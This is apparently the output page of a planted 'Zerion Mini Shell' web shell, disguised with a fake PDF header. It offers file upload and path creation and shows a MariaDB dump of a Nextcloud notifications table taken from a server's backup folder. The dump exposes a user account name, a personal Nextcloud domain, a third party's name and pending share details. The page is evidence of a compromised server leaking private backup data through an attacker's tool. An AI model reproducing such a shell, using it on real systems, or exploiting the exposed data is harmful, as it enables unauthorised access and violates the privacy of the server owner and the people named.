%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/985914/root/backups/db_backups/mysql/db.old/nextcloud/
Upload File :
Create Path :
Current File : //proc/985914/root/backups/db_backups/mysql/db.old/nextcloud/oc_notifications.sql

/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.6.22-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: nextcloud
-- ------------------------------------------------------
-- Server version	10.6.22-MariaDB-0ubuntu0.22.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `oc_notifications`
--

DROP TABLE IF EXISTS `oc_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `oc_notifications` (
  `notification_id` int(11) NOT NULL AUTO_INCREMENT,
  `app` varchar(32) NOT NULL,
  `user` varchar(64) NOT NULL,
  `timestamp` int(11) NOT NULL DEFAULT 0,
  `object_type` varchar(64) NOT NULL,
  `object_id` varchar(64) NOT NULL,
  `subject` varchar(64) NOT NULL,
  `subject_parameters` longtext DEFAULT NULL,
  `message` varchar(64) DEFAULT NULL,
  `message_parameters` longtext DEFAULT NULL,
  `link` varchar(4000) DEFAULT NULL,
  `icon` varchar(4000) DEFAULT NULL,
  `actions` longtext DEFAULT NULL,
  PRIMARY KEY (`notification_id`),
  KEY `oc_notifications_app` (`app`),
  KEY `oc_notifications_user` (`user`),
  KEY `oc_notifications_timestamp` (`timestamp`),
  KEY `oc_notifications_object` (`object_type`,`object_id`)
) ENGINE=InnoDB AUTO_INCREMENT=134 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_bin ROW_FORMAT=DYNAMIC;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `oc_notifications`
--

LOCK TABLES `oc_notifications` WRITE;
/*!40000 ALTER TABLE `oc_notifications` DISABLE KEYS */;
INSERT INTO `oc_notifications` VALUES (2,'firstrunwizard','waritko',1556610452,'user','waritko','profile','[]','','[]','','','[]'),(22,'updatenotification','waritko',1607597736,'files_texteditor','2.14.0','update_available','[]','','[]','','','[]'),(24,'firstrunwizard','waritko',1670526617,'app','mail','apphint-mail','[]','','[]','','','[]'),(25,'firstrunwizard','waritko',1670526618,'app','spreed','apphint-spreed','[]','','[]','','','[]'),(26,'firstrunwizard','waritko',1670526870,'app','groupfolders','apphint-groupfolders','[]','','[]','','','[]'),(27,'firstrunwizard','waritko',1670526870,'app','social','apphint-social','[]','','[]','','','[]'),(28,'firstrunwizard','waritko',1670526870,'app','notes','apphint-notes','[]','','[]','','','[]'),(29,'firstrunwizard','waritko',1670526870,'app','deck','apphint-deck','[]','','[]','','','[]'),(30,'firstrunwizard','waritko',1670526870,'app','tasks','apphint-tasks','[]','','[]','','','[]'),(32,'passwords','waritko',1689115435,'object','password','bad_password','{\"count\":1}','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"link\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/#\\/security\\/2\",\"type\":\"WEB\",\"primary\":true}]'),(33,'passwords','waritko',1689115438,'admin','survey','survey','[]','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"enable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/yes\",\"type\":\"GET\",\"primary\":true},{\"label\":\"disable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/no\",\"type\":\"GET\",\"primary\":false}]'),(56,'passwords','waritko',1703430124,'app','requirements','upgrade_required','{\"ncVersion\":28,\"phpVersion\":80127,\"appVersion\":\"2023.12.31\"}','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"link\",\"link\":\"https:\\/\\/git.mdns.eu\\/nextcloud\\/passwords\\/-\\/wikis\\/Administrators\\/Notifications\\/Platform-Support-Notification\",\"type\":\"WEB\",\"primary\":true}]'),(57,'survey_client','waritko',1703430285,'dummy','23','updated','[]','','[]','','','[{\"label\":\"enable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/survey_client\\/api\\/v1\\/monthly\",\"type\":\"POST\",\"primary\":true},{\"label\":\"disable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/survey_client\\/api\\/v1\\/monthly\",\"type\":\"DELETE\",\"primary\":false}]'),(65,'passwords','waritko',1705039322,'admin','survey','survey','[]','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"enable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/yes\",\"type\":\"GET\",\"primary\":true},{\"label\":\"disable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/no\",\"type\":\"GET\",\"primary\":false}]'),(66,'passwords','waritko',1705550548,'object','password','bad_password','{\"count\":19}','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"link\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/#\\/security\\/2\",\"type\":\"WEB\",\"primary\":true}]'),(89,'survey_client','waritko',1714032241,'dummy','23','updated','[]','','[]','','','[{\"label\":\"enable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/survey_client\\/api\\/v1\\/monthly\",\"type\":\"POST\",\"primary\":true},{\"label\":\"disable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/survey_client\\/api\\/v1\\/monthly\",\"type\":\"DELETE\",\"primary\":false}]'),(111,'passwords','waritko',1720843323,'admin','survey','survey','[]','','[]','','https://nextcloud.varak.net/apps/passwords/img/app-dark.svg','[{\"label\":\"enable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/yes\",\"type\":\"GET\",\"primary\":true},{\"label\":\"disable\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/index.php\\/apps\\/passwords\\/notification\\/survey\\/no\",\"type\":\"GET\",\"primary\":false}]'),(120,'updatenotification','waritko',1724299468,'calendar','4.7.16','update_available','[]','','[]','','','[]'),(124,'updatenotification','waritko',1726452257,'passwords','2024.9.10','update_available','[]','','[]','','','[]'),(125,'updatenotification','waritko',1727082253,'bookmarks','14.2.6','update_available','[]','','[]','','','[]'),(127,'firstrunwizard','waritko',1734424542,'app','recognize','apphint-recognize','[]','','[]','','','[]'),(128,'firstrunwizard','waritko',1734424543,'app','forms','apphint-forms','[]','','[]','','','[]'),(129,'firstrunwizard','waritko',1734424543,'app','whiteboard','apphint-whiteboard','[]','','[]','','','[]'),(130,'files_sharing','waritko',1740491005,'remote_share','1','remote_share','[\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"foto_web_klubovna\",\"\"]','','[]','','','[{\"label\":\"decline\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/1\",\"type\":\"DELETE\",\"primary\":false},{\"label\":\"accept\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/1\",\"type\":\"POST\",\"primary\":false}]'),(131,'files_sharing','waritko',1740491006,'remote_share','2','remote_share','[\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"foto_web_klubovna\",\"\"]','','[]','','','[{\"label\":\"decline\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/2\",\"type\":\"DELETE\",\"primary\":false},{\"label\":\"accept\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/2\",\"type\":\"POST\",\"primary\":false}]'),(132,'files_sharing','waritko',1740491009,'remote_share','3','remote_share','[\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"foto_web_klubovna\",\"\"]','','[]','','','[{\"label\":\"decline\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/3\",\"type\":\"DELETE\",\"primary\":false},{\"label\":\"accept\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/3\",\"type\":\"POST\",\"primary\":false}]'),(133,'files_sharing','waritko',1740491100,'remote_share','4','remote_share','[\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"Matej Golembiovsky@https:\\/\\/nextcloud.htdm.net\\/\",\"foto_web_klubovna\",\"\"]','','[]','','','[{\"label\":\"decline\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/4\",\"type\":\"DELETE\",\"primary\":false},{\"label\":\"accept\",\"link\":\"https:\\/\\/nextcloud.varak.net\\/ocs\\/v2.php\\/apps\\/files_sharing\\/api\\/v1\\/remote_shares\\/pending\\/4\",\"type\":\"POST\",\"primary\":false}]');
/*!40000 ALTER TABLE `oc_notifications` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2025-08-29  4:11:48

Zerion Mini Shell 1.0